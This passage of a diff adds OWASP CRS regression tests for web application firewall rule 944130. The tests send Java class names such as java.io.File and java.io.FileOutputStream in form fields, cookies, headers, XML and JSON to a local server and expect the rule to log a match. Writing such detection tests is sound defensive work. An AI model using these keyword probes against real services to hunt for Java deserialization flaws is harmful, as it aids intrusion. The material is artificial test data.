element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-53 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-54 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-55 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-56 + desc: "Argument test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-57 + desc: "Argument name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-58 + desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
test=java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-59 + desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-60 + desc: "Request header test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-61 + desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-62 + desc: "XML element value includes keyword 
java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-63 + desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-64 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-65 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-66 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-67 + desc: "Argument test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-68 + desc: "Argument name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-69 + desc: "Cookie test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-70 + desc: "Cookie name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-71 + desc: "Request header test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-72 + desc: "XML attribute value includes keyword 
java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-73 + desc: "XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-74 + desc: "Nested XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-75 + desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-76 + desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-77 + desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-78 + desc: "Argument test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-79 + desc: 
"Argument name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-80 + desc: "Cookie test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-81 + desc: "Cookie name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-82 + desc: "Request header test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-83 + desc: "XML attribute value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-84 + desc: "XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-85 + desc: "Nested XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + 
output: + log_contains: "id \"944130\"" + - test_title: 944130-86 + desc: "Content-Type text/plain includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-87 + desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-88 + desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-89 + desc: "Argument test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-90 + desc: "Argument name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-91 + desc: "Cookie test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-92 + desc: "Cookie name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + 
version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-93 + desc: "Request header test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-94 + desc: "XML attribute value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-95 + desc: "XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-96 + desc: "Nested XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-97 + desc: "Content-Type text/plain includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-98 + desc: "Content-Type application/json arg value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-99 + desc: "Content-Type application/json arg name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log_contains: "id 
\"944130\"" + - test_title: 944130-100 + desc: "Argument test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-101 + desc: "Argument name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-102 + desc: "Cookie test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-103 + desc: "Cookie name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-104 + desc: "Request header test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-105 + desc: "XML attribute value 